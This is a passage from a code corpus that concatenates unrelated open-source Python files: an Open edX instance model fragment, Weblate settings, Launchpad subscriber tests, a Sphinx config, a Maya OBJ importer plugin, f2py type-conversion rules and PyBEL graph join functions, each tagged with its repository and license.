return 0, False
new_configurations = self._generate_consul_metadata()
version, updated = self._write_metadata_to_consul(new_configurations)
return version, updated
def purge_consul_metadata(self):
"""
This method is responsible for purging all instances' metadata from
Consul if they exist.
"""
if not settings.CONSUL_ENABLED:
return
self.logger.info('Purging consul metadata with prefix: %s.', self.consul_prefix)
agent = ConsulAgent(prefix=self.consul_prefix)
agent.purge()
def get_provisioning_appservers(self):
"""
Returns a list of AppServers that are currently in the process of being launched.
"""
in_progress_statuses = AppServerStatus.states_with(ids_only=True, is_configuration_state=True)
return self.appserver_set.filter(_status__in=in_progress_statuses)
| open-craft/opencraft | instance/models/openedx_instance.py | Python | agpl-3.0 | 28,216 |
USER_SETTINGS = {
'DEBUG': True,
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
'TIME_ZONE': 'UTC',
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
'LANGUAGE_CODE': 'en-us',
# URL prefix to use, please see documentation for more details
'URL_PREFIX': '',
# Title of site to use
'SITE_TITLE': 'Weblate',
# E-mail address that error messages come from.
'SERVER_EMAIL': 'noreply@weblate.org',
# Default email address to use for various automated correspondence from
# the site managers. Used for registration emails.
'DEFAULT_FROM_EMAIL': 'noreply@weblate.org',
# List of URLs your site is supposed to serve, required since Django 1.5
'ALLOWED_HOSTS': [],
# Toggle user registeration
'REGISTRATION_OPEN': True
}
| capitalm-chen/weblate-docker-fig | build/weblate/settings_user_default.py | Python | gpl-2.0 | 1,248 |
# Copyright 2011 Canonical Ltd. This software is licensed under the
# GNU Affero General Public License version 3 (see the file LICENSE).
__metaclass__ = type
from zope.component import getUtility
from lp.services.worlddata.interfaces.language import ILanguageSet
from lp.testing import (
person_logged_in,
TestCaseWithFactory,
)
from lp.testing.layers import DatabaseFunctionalLayer
class TestQuestionDirectSubscribers(TestCaseWithFactory):
layer = DatabaseFunctionalLayer
def test_get_direct_subscribers(self):
question = self.factory.makeQuestion()
subscriber = self.factory.makePerson()
subscribers = [question.owner, subscriber]
with person_logged_in(subscriber):
question.subscribe(subscriber, subscriber)
direct_subscribers = question.getDirectSubscribers()
self.assertEqual(
set(subscribers), set(direct_subscribers),
"Subscribers did not match expected value.")
def test_get_direct_subscribers_with_details_other_subscriber(self):
# getDirectSubscribersWithDetails() returns
# Person and QuestionSubscription records in one go.
question = self.factory.makeQuestion()
with person_logged_in(question.owner):
# Unsubscribe question owner so it doesn't taint the result.
question.unsubscribe(question.owner, question.owner)
subscriber = self.factory.makePerson()
subscribee = self.factory.makePerson()
with person_logged_in(subscriber):
subscription = question.subscribe(subscribee, subscriber)
self.assertContentEqual(
[(subscribee, subscription)],
question.getDirectSubscribersWithDetails())
def test_get_direct_subscribers_with_details_self_subscribed(self):
# getDirectSubscribersWithDetails() returns
# Person and QuestionSubscription records in one go.
question = self.factory.makeQuestion()
with person_logged_in(question.owner):
# Unsubscribe question owner so it doesn't taint the result.
question.unsubscribe(question.owner, question.owner)
subscriber = self.factory.makePerson()
with person_logged_in(subscriber):
subscription = question.subscribe(subscriber, subscriber)
self.assertContentEqual(
[(subscriber, subscription)],
question.getDirectSubscribersWithDetails())
class TestQuestionInDirectSubscribers(TestCaseWithFactory):
layer = DatabaseFunctionalLayer
def test_answerContactIsIndirectSubscriber(self):
# Question answer contacts are indirect subscribers to questions.
person = self.factory.makePerson()
person.addLanguage(getUtility(ILanguageSet)['en'])
question = self.factory.makeQuestion()
with person_logged_in(question.owner):
question.target.addAnswerContact(person, person)
# Check the results.
self.assertEqual([person], question.getIndirectSubscribers())
def test_assigneeIsIndirectSubscriber(self):
# Question assignees are indirect subscribers to questions.
person = self.factory.makePerson()
question = self.factory.makeQuestion()
with person_logged_in(question.owner):
question.assignee = person
# Check the results.
self.assertEqual([person], question.getIndirectSubscribers())
def test_answerContactIsIndirectSubscriberCorrectLanguage(self):
# Question answer contacts are indirect subscribers to questions and
# are filtered according to the question's language.
english_person = self.factory.makePerson()
english_person.addLanguage(getUtility(ILanguageSet)['en'])
spanish = getUtility(ILanguageSet)['es']
spanish_person = self.factory.makePerson()
spanish_person.addLanguage(spanish)
question = self.factory.makeQuestion(language=spanish)
with person_logged_in(question.owner):
question.target.addAnswerContact(english_person, english_person)
question.target.addAnswerContact(spanish_person, spanish_person)
# Check the results.
self.assertEqual([spanish_person], question.getIndirectSubscribers())
| abramhindle/UnnaturalCodeFork | python/testdata/launchpad/lib/lp/answers/model/tests/test_question.py | Python | agpl-3.0 | 4,271 |
# -*- coding: utf-8 -*-
#
# napalm documentation build configuration file, created by
# sphinx-quickstart on Tue Dec 16 13:17:14 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
autoclass_content = 'both'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'pyPluribus'
copyright = u'2016, CloudFlare, Inc.'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.3'
# The full version, including alpha/beta/rc tags.
release = '0.3.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not on_rtd: # only import and set the theme if we're building docs locally
import sphinx_rtd_theme
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
else:
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'pypluribusdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'pypluribus.tex', u'pyPluribus Documentation',
u'Mircea Ulinic', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'pyPluribus', u'pyPluribus Documentation',
[u'Mircea Ulinic'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'pyPluribus', u'pyPluribus Documentation',
u'Mircea Ulinic', 'pyPluribus', 'Python library to interact with Pluribus devices.',
'Python library to interact with Pluribus devices.'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| mirceaulinic/pypluribus | docs/conf.py | Python | apache-2.0 | 8,555 |
import maya.OpenMaya as OpenMaya
import maya.OpenMayaMPx as OpenMayaMPx
import sys
from io import XPlaneOBJReader
# Initialize the script plug-in
def initializePlugin(mobject):
mplugin = OpenMayaMPx.MFnPlugin(mobject)
try:
mplugin.registerCommand( kPluginCmdName, cmdCreator )
except:
sys.stderr.write( "Failed to register command: %s\n" % kPluginCmdName )
raise
def uninitializePlugin(mobject):
mplugin = OpenMayaMPx.MFnPlugin(mobject)
try:
mplugin.deregisterCommand( kPluginCmdName )
except:
sys.stderr.write( "Failed to unregister command: %s\n" % kPluginCmdName )
raise
class scriptedCommand(OpenMayaMPx.MPxCommand):
def __init__(self):
OpenMayaMPx.MPxCommand.__init__(self)
def doIt(self, argList):
print argList
print "ARG LIST ABOVE"
xpreader = XPlaneOBJReader()
geoObj = xpreader.read("") #PATH TO FILE FROM ARGS
outputMesh = maya.OpenMaya.MObject()
numFaces = len( geoObj.polyList )
numVertices = len( geoObj.vertexList )
print "VERT COUNT: %d" % numVertices
print "FACE COUNT: %d" % numFaces
UVSetNames = ['map1', 'other']
points = maya.OpenMaya.MFloatPointArray()
uArray = maya.OpenMaya.MFloatArray()
vArray = maya.OpenMaya.MFloatArray()
# CONVERT THE POINTS TO MAYA FORMAT
print "CREATING VERTICIES"
for vertex in geoObj.vertexList:
p = maya.OpenMaya.MFloatPoint( vertex.x, vertex.y, vertex.z )
points.append(p)
uArray.append(vertex.u)
vArray.append(vertex.v)
# vertex connections per poly face in one array of indexs into point array given above
faceConnects = maya.OpenMaya.MIntArray()
for point in geoObj.pointList:
faceConnects.append(point)
# an array to hold the total number of vertices that each face has
faceCounts = maya.OpenMaya.MIntArray()
for poly in geoObj.polyList:
faceCounts.append( len( poly.points ) )
meshFS = maya.OpenMaya.MFnMesh()
#newMesh = meshFS.create(numVertices, numFaces, points, faceCounts, faceConnects, outputMesh)
newMesh = meshFS.create(numVertices, numFaces, points, faceCounts, faceConnects, uArray, vArray, outputMesh) # ADDING THE UVs TO THE MESH AT THE SAME TIME
meshFS.updateSurface()
nodeName = meshFS.name()
print 'Mesh node name is: %s' % nodeName
# CREATE THE UV SET # TRYING TO REPLACE THIS WITH THE create METHOD ABOVE
#meshFS.createUVSetWithName( UVSetNames[1] )
#meshFS.setUVs(uArray, vArray, UVSetNames[1] )
#assign new mesh to default shading group
maya.cmds.sets(nodeName, e=True, fe='initialShadingGroup')
| renderbox/xplane-maya | mayaXPlaneImporter.py | Python | mit | 2,851 |
"""
TODO: npy_void
"""
import numpy
from capi import sctypebits
scalar = dict(
c_char = dict(\
ctype = 'signed char',
init = ' = 0',
argument_format = 'b',
return_format = 'b',
argument_title = 'a python integer (converting to C signed char)',
return_title = 'a python integer (converting from C signed char)',
),
c_short = dict(\
ctype = 'short int',
init = ' = 0',
argument_format = 'h',
return_format = 'h',
argument_title = 'a python integer (converting to C short int)',
return_title = 'a python integer (converting from C short int)',
),
c_int = dict(\
ctype = 'int',
init = ' = 0',
argument_format = 'i',
return_format = 'i',
argument_title = 'a python integer (converting to C int)',
return_title = 'a python integer (converting from C int)',
),
c_long = dict(\
ctype = 'long',
init = ' = 0',
argument_format = 'l',
return_format = 'l',
argument_title = 'a python integer (converting to C long int)',
return_title = 'a python integer (converting from C long int)',
),
c_long_long = dict(\
ctype = 'PY_LONG_LONG',
init = ' = 0',
argument_format = 'L',
return_format = 'L',
argument_title = 'a python integer (converting to C PY_LONG_LONG)',
return_title = 'a python integer (converting from C PY_LONG_LONG)',
),
c_unsigned_char = dict(\
ctype = 'unsigned char',
init = ' = 0',
argument_format = 'B',
return_format = 'B',
argument_title = 'a python integer (converting to C unsigned char)',
return_title = 'a python integer (converting from C unsigned char)',
),
c_unsigned_short = dict(\
ctype = 'unsigned short int',
init = ' = 0',
argument_format = 'H',
return_format = 'H',
argument_title = 'a python integer (converting to C unsigned short int)',
return_title = 'a python integer (converting from C unsigned short int)',
),
c_unsigned_int = dict(\
ctype = 'unsigned int',
init = ' = 0',
argument_format = 'I',
return_format = 'I',
argument_title = 'a python integer (converting to C unsigned int)',
return_title = 'a python integer (converting from C unsigned int)',
),
c_unsigned_long = dict(\
ctype = 'unsigned long',
init = ' = 0',
argument_format = 'k',
return_format = 'k',
argument_title = 'a python integer (converting to C unsigned long int)',
return_title = 'a python integer (converting from C unsigned long int)',
),
c_unsigned_long_long = dict(\
ctype = 'unsigned PY_LONG_LONG',
init = ' = 0',
argument_format = 'K',
return_format = 'K',
argument_title = 'a python integer (converting to C unsigned PY_LONG_LONG)',
return_title = 'a python integer (converting from C unsigned PY_LONG_LONG)',
),
c_float = dict(\
ctype = 'float',
init = ' = 0.0',
argument_format = 'f',
return_format = 'f',
argument_title = 'a python floating point number (converting to C float)',
return_title = 'a python floating point number (converting from C float)',
),
c_double = dict(\
ctype = 'double',
init = ' = 0.0',
argument_format = 'd',
return_format = 'd',
argument_title = 'a python floating point number (converting to C double)',
return_title = 'a python floating point number (converting from C double)',
),
c_Py_complex = dict(\
ctype = 'Py_complex',
argument_format = 'D',
return_format = 'D',
init = ' = {0.0, 0.0}',
argument_title = 'a python complex number (converting to C Py_complex structure)',
return_title = 'a python complex number (converting from C Py_complex structure)',
),
c_Py_ssize_t = dict(\
ctype = 'Py_ssize_t',
argument_format = 'n',
return_format = 'n',
init = ' = 0',
argument_title = 'a python integer (converting to C Py_ssize_t)',
return_title = 'a python integer (converting from C Py_ssize_t)',
),
c_char1 = dict(\
ctype = 'char',
argument_format = 'c',
return_format = 'c',
init = " = '\\0'",
argument_title = 'a python character (converting to C char)',
return_title = 'a python character (converting from C char)',
),
c_const_char_ptr = dict(\
ctype = 'const char *',
argument_format = 'z',
return_format = 'z',
init = ' = NULL',
argument_title = 'a python string or Unicode or None object (converting to C const char *)',
return_title = 'a python string or None (converting from C char *)',
),
c_char_ptr = dict(\
ctype = 'char *',
argument_format = 'O&',
argument_converter = 'pyobj_to_char_ptr',
clean_argument_converter = 'clean_pyobj_to_char_ptr',
return_format = 'z',
init = ' = NULL',
argument_title = 'a python string (converting to C char *)',
return_title = 'a python string or None (converting from C char *)',
),
c_Py_UNICODE_ptr = dict(\
ctype = 'Py_UNICODE*',
argument_format ='u',
return_format = 'u',
init = ' = NULL',
argument_title = 'a python Unicode object (converting to C Py_UNICODE*)',
return_title = 'a python Unicode object or None (converting from C Py_UNICODE*)'
),
py_bool = dict(\
ctype = 'PyBoolObject*',
init = ' = NULL',
pyctype = 'PyBool_Type',
argument_format = 'O!',
return_format = 'N',
title = 'a python bool'
),
py_int = dict(\
ctype = 'PyIntObject*',
init = ' = NULL',
pyctype = 'PyInt_Type',
argument_format = 'O!',
return_format = 'N',
title = 'a python integer'
),
py_long = dict(\
ctype = 'PyLongObject*',
init = ' = NULL',
pyctype = 'PyLong_Type',
argument_format = 'O!',
return_format = 'N',
title = 'a python long integer'
),
py_float = dict(\
ctype = 'PyFloatObject*',
init = ' = NULL',
pyctype = 'PyFloat_Type',
argument_format = 'O!',
return_format = 'N',
title = 'a python floating point number'
),
py_complex = dict(\
ctype = 'PyComplexObject*',
init = ' = NULL',
pyctype = 'PyComplex_Type',
argument_format = 'O!',
return_format = 'N',
title = 'a python complex number'
),
py_str = dict(\
ctype = 'PyStringObject*',
init = ' = NULL',
argument_format = 'S',
return_format = 'N',
title = 'a python string'
),
py_unicode = dict(\
ctype = 'PyUnicodeObject*',
init = ' = NULL',
argument_format = 'U',
return_format = 'N',
title = 'a python Unicode object'
),
py_buffer = dict(\
pyctype = 'PyBuffer_Type',
ctype = 'PyBufferObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a python buffer'),
py_tuple = dict(\
pyctype = 'PyTuple_Type',
ctype = 'PyTupleObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a python tuple'),
py_list = dict(\
pyctype = 'PyList_Type',
ctype = 'PyListObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a python list'),
py_dict = dict(\
pyctype = 'PyDict_Type',
ctype = 'PyDictObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a python dictionary'),
py_file = dict(\
pyctype = 'PyFile_Type',
ctype = 'PyFileObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a python file object'),
py_instance = dict(\
pyctype = 'PyInstance_Type',
ctype = 'PyObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a python instance object'),
py_function = dict(\
pyctype = 'PyFunction_Type',
ctype = 'PyFunctionObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a python function object'),
py_method = dict(\
pyctype = 'PyMethod_Type',
ctype = 'PyObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a python instance method object'),
py_module = dict(\
pyctype = 'PyModule_Type',
ctype = 'PyObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a python module object'),
py_iter = dict(\
pyctype = 'PySeqIter_Type',
ctype = 'PyObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a python iterator'),
py_property = dict(\
pyctype = 'PyProperty_Type',
ctype = 'PyObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a python property attribute'),
py_slice = dict(\
pyctype = 'PySlice_Type',
ctype = 'PyObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a python slice object'),
py_cell = dict(\
pyctype = 'PyCell_Type',
ctype = 'PyCellObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL'),
py_generator = dict(\
pyctype = 'PyGen_Type',
ctype = 'PyGenObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL'),
py_set = dict(\
pyctype = 'PySet_Type',
ctype = 'PySetObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a python set object'),
py_frozenset = dict(\
pyctype = 'PyFrozenSet_Type',
ctype = 'PySetObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a python frozenset object'),
py_cobject = dict(\
ctype = 'PyCObject*',
argument_format = 'O',
return_format = 'N',
init = ' = NULL',
title = 'a PyCObject object'),
py_type = dict(\
pyctype = 'PyType_Type',
ctype = 'PyTypeObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a python type object'),
py_object = dict(\
ctype = 'PyObject*',
argument_format = 'O',
return_format = 'N',
init = ' = NULL',
title = 'a python object'),
numeric_array = dict(\
pyctype = 'PyArray_Type',
ctype = 'PyArrayObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a Numeric array',
require_numeric = True,
),
numpy_ndarray = dict(\
pyctype = 'PyArray_Type',
ctype = 'PyArrayObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a numpy array',
require_numpy = True,
),
numpy_descr = dict(\
pyctype = 'PyArrayDescr_Type',
ctype = 'PyArray_Descr*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
require_numpy = True,
),
numpy_ufunc = dict(\
pyctype = 'PyUFunc_Type',
ctype = 'PyUFuncObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
title = 'a numpy universal function',
require_numpy = True,
),
numpy_iter = dict(\
pyctype = 'PyArrayIter_Type',
ctype = 'PyArrayIterObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
require_numpy = True,
),
numpy_multiiter = dict(\
pyctype = 'PyArrayMultiIter_Type',
ctype = 'PyArrayMultiIterObject*',
argument_format = 'O!',
return_format = 'N',
init = ' = NULL',
require_numpy = True,
),
npy_bool = dict(\
ctype = 'npy_bool',
init = ' = 0',
argument_format = 'O&',
argument_converter = 'pyobj_to_npy_bool',
return_format = 'O&',
return_converter = 'pyobj_from_npy_bool',
argument_title = 'a python truth value (converting to C npy_bool)',
return_title = 'a numpy bool',
require_numpy = True,
),
numpy_bool = dict(\
ctype = 'PyBoolScalarObject*',
init = ' = NULL',
argument_format = 'O&',
argument_converter = 'pyobj_to_numpy_bool',
return_format = 'N',
require_numpy = True,
argument_title = 'a python bool (converting to C PyBoolScalarObject*)',
return_title = 'a numpy bool',
),
numpy_string = dict(\
ctype = 'PyStringScalarObject*',
init = ' = NULL',
argument_format = 'O&',
argument_converter = 'pyobj_to_numpy_string',
return_format = 'N',
require_numpy = True,
argument_title = 'a python string (converting to C PyStringScalarObject*)',
return_title = 'a numpy string',
),
numpy_unicode = dict(\
ctype = 'PyUnicodeScalarObject*',
init = ' = NULL',
argument_format = 'O&',
argument_converter = 'pyobj_to_numpy_unicode',
return_format = 'N',
require_numpy = True,
argument_title = 'a python string (converting to C PyUnicodeScalarObject*)',
return_title = 'a numpy unicode',
),
npy_string = dict(\
typedef = 'npy_string',
ctype = 'npy_string',
init = ' = {NULL, 0}',
argument_format = 'O&',
argument_converter = 'pyobj_to_npy_string',
clean_argument_converter = 'clean_pyobj_to_npy_string',
return_format = 'O&',
return_converter = 'pyobj_from_npy_string',
require_numpy = True,
argument_title = 'a python string (converting to C npy_string)',
return_title = 'a numpy string',
),
npy_unicode = dict(\
typedef = 'npy_unicode',
ctype = 'npy_unicode',
init = ' = {NULL, 0}',
argument_format = 'O&',
argument_converter = 'pyobj_to_npy_unicode',
clean_argument_converter = 'clean_pyobj_to_npy_unicode',
return_format = 'O&',
return_converter = 'pyobj_from_npy_unicode',
require_numpy = True,
argument_title = 'a python string (converting to C npy_unicode)',
return_title = 'a numpy unicode',
),
numpy_void = dict(\
ctype = 'PyVoidScalarObject*',
init = ' = NULL',
argument_format = 'O&',
argument_converter = 'pyobj_to_numpy_void',
return_format = 'N',
require_numpy = True,
argument_title = 'a python string (converting to C PyVoidScalarObject*)',
return_title = 'a numpy void',
),
)
scalar['c_PY_LONG_LONG'] = scalar['c_long_long']
scalar['c_unsigned_PY_LONG_LONG'] = scalar['c_unsigned_long_long']
scalar['numpy_bool_'] = scalar['numpy_bool']
scalar['numpy_str_'] = scalar['numpy_str'] = scalar['numpy_string0'] \
= scalar['numpy_string_'] = scalar['numpy_string']
scalar['numpy_unicode0'] = scalar['numpy_unicode_'] = scalar['numpy_unicode']
scalar['npy_str'] = scalar['npy_string']
scalar['numpy_void0'] = scalar['numpy_void']
for Cls_name, bits_list in sctypebits.items():
if Cls_name=='Complex':
init = ' = {0.0, 0.0}'
t = 'complex'
elif Cls_name=='Float':
init = ' = 0.0'
t = 'floating point number'
else:
init = ' = 0'
t = 'integer'
for bits in bits_list:
n = Cls_name.lower() + str(bits)
Cls = Cls_name + str(bits)
ctype = 'npy_' + n
scalar[ctype] = dict(
ctype = ctype,
pycype = None,
init = init,
argument_format = 'O&',
argument_converter = 'pyobj_to_'+ctype,
return_format = 'O&',
return_converter = 'pyobj_from_'+ctype,
require_numpy = True,
argument_title = 'a python %s (converting to C %s)' % (t,ctype),
return_title = 'a numpy %s-bit %s' % (bits, t)
)
ctype = 'Py%sScalarObject*' % (Cls)
ctype_name = 'numpy_' + n
scalar[ctype_name] = dict(
ctype = ctype,
pyctype = None,
init = ' = NULL',
argument_format = 'O&',
argument_converter = 'pyobj_to_'+ctype_name,
return_format = 'N',
require_numpy = True,
argument_title = 'a python %s (converting to C %s)' % (t,ctype),
return_title = 'a numpy %s-bit %s' % (bits, t)
)
scalar['npy_intp'] = scalar['npy_'+numpy.intp.__name__]
scalar['npy_int'] = scalar['npy_'+numpy.int_.__name__]
scalar['npy_float'] = scalar['npy_'+numpy.float_.__name__]
scalar['npy_complex'] = scalar['npy_'+numpy.complex_.__name__]
array = dict(
numpy_int64 = dict(\
typenum = 'PyArray_INT64',
ctype = 'PyArrayObject*',
init = ' = NULL',
title = 'a numpy array of 64-bit integers',
argument_format = 'O&',
argument_converter = 'pyobj_to_numpy_array_int64',
return_format = 'N',
require_numpy = True,
),
c_int = dict(\
ctype='int*',
init=' = NULL',
title='a C int array',
input_title = 'a python integer sequence (converting to C int*)',
input_format = 'O',
input_object = '&%(varname)s_py',
input_frompyobj = dict(\
required = '%(varname)s_arr = PyArray_FROMANY(%(varname)s_py, NPY_INT, %(rank)s, %(rank)s, %(requirements)s);\n'
'if (%(varname)s_arr != NULL) {\n'
' %(varname)s = PyArray_DATA(%(varname)s_arr);',
),
input_cleanfrompyobj = dict(\
required = '} /*if (%(varname)s_arr != NULL)*/'
),
output_title = 'a python integer sequence (converting from C int*)',
output_format = 'N',
output_object = '%(varname)s_arr'
),
numpy_int8 = dict(\
ctype='npy_int8*',
init=' = NULL',
title='a C npy_int8 array'
)
)
| travellhyne/f2py | extgen/type_rules.py | Python | bsd-3-clause | 17,012 |
# -*- coding: utf-8 -*-
"""Operations for BEL graphs."""
from typing import Iterable
import networkx as nx
from tqdm.autonotebook import tqdm
from .utils import update_metadata
from ..dsl import BaseEntity
__all__ = [
"subgraph",
"left_full_join",
"left_outer_join",
"union",
"left_node_intersection_join",
"node_intersection",
]
def subgraph(graph, nodes: Iterable[BaseEntity]):
"""Induce a sub-graph over the given nodes.
:rtype: BELGraph
"""
sg = graph.subgraph(nodes)
# see implementation for .copy()
rv = graph.child()
rv.graph.update(sg.graph)
for node, data in sg.nodes(data=True):
rv.add_node(node, **data)
rv.add_edges_from((u, v, key, datadict.copy()) for u, v, key, datadict in sg.edges(keys=True, data=True))
return rv
def left_full_join(g, h) -> None:
"""Add all nodes and edges from ``h`` to ``g``, in-place for ``g``.
:param pybel.BELGraph g: A BEL graph
:param pybel.BELGraph h: A BEL graph
Example usage:
>>> import pybel
>>> g = pybel.from_bel_script('...')
>>> h = pybel.from_bel_script('...')
>>> left_full_join(g, h)
"""
g.add_nodes_from((node, data) for node, data in h.nodes(data=True) if node not in g)
g.add_edges_from(
(u, v, key, data)
for u, v, key, data in h.edges(keys=True, data=True)
if u not in g or v not in g[u] or key not in g[u][v]
)
update_metadata(h, g)
g.warnings.extend(h.warnings)
def left_outer_join(g, h) -> None:
"""Only add components from the ``h`` that are touching ``g``.
Algorithm:
1. Identify all weakly connected components in ``h``
2. Add those that have an intersection with the ``g``
:param BELGraph g: A BEL graph
:param BELGraph h: A BEL graph
Example usage:
>>> import pybel
>>> g = pybel.from_bel_script('...')
>>> h = pybel.from_bel_script('...')
>>> left_outer_join(g, h)
"""
g_nodes = set(g)
for comp in nx.weakly_connected_components(h):
if g_nodes.intersection(comp):
h_subgraph = subgraph(h, comp)
left_full_join(g, h_subgraph)
def _left_outer_join_graphs(target, graphs):
"""Outer join a list of graphs to a target graph.
Note: the order of graphs will have significant results!
:param BELGraph target: A BEL graph
:param iter[BELGraph] graphs: An iterator of BEL graphs
:rtype: BELGraph
"""
for graph in graphs:
left_outer_join(target, graph)
return target
def union(graphs, use_tqdm: bool = False):
"""Take the union over a collection of graphs into a new graph.
Assumes iterator is longer than 2, but not infinite.
:param iter[BELGraph] graphs: An iterator over BEL graphs. Can't be infinite.
